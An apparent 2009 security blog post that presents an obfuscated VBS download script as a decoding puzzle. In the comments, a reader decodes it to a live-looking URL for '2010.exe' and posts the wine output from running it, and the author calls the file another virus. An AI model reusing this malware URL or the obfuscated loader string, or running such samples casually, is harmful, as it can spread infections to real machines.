Home > malware > Funny run.vbs

Funny run.vbs

September 23rd, 2009 KaiJern Leave a comment Go to comments

I did not scan with anything yet.
But, for sure its a simple download script.

Simple as in a 10 liner. Try to decode ?
Check this out :)


,Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)
+Chr(47)+Chr(50)+Chr(48)+Chr(51)+Chr(46)+Chr(49)
+Chr(49)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(57)
+Chr(46)+Chr(49)+Chr(50)+Chr(47)+Chr(50)+Chr(48)
+Chr(49)+Chr(48)+Chr(46)+Chr(101)+Chr(120)+Chr(101)

Got the answer ? Reply me :)

Categories: malware Tags: ,
  1. Anonymous
    September 23rd, 2009 at 10:18 | #1
    Reply | Quote

    What u meant by ‘answer’ ?? .. the string??

    In [1]: chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+chr(47)+chr(47)+chr(50)+chr(48)+chr(51)+chr(46)+chr(49)+chr(49)+chr(48)+chr(46)+chr(49)+chr(54)+chr(57)+chr(46)+chr(49)+chr(50)+chr(47)+chr(50)+chr(48)+chr(49)+chr(48)+chr(46)+chr(101)+chr(120)+chr(101)
    Out[1]: ‘http://203.110.169.12/2010.exe’

    erm ????

    $ wine ~/Download/2010.exe
    fixme:advapi:LookupAccountNameW L”" L”izhar” (nil) 0×32f80c (nil) 0×32f800 0×32f7b0 – stub
    fixme:advapi:LookupAccountNameW L”" L”izhar” 0×113c50 0×32f80c 0×113cb0 0×32f800 0×32f7b0 – stub
    fixme:netapi32:NetUserGetLocalGroups ((null), L”izhar”, 0, 00000001, 0×32fcd0 -1, 0×32fccc, 0×32fcc4) stub!
    fixme:advapi:LookupAccountNameW L”" L”Administrators” (nil) 0×32f80c (nil) 0×32f800 0×32f7b0 – stub
    err:service:validate_context_handle Access denied – handle created with access 2, needed 8

  2. xwings
    September 23rd, 2009 at 11:21 | #2
    Reply | Quote

    2010.exe suppose to be another virus.
    well. :0 enjoy.

  1. No trackbacks yet.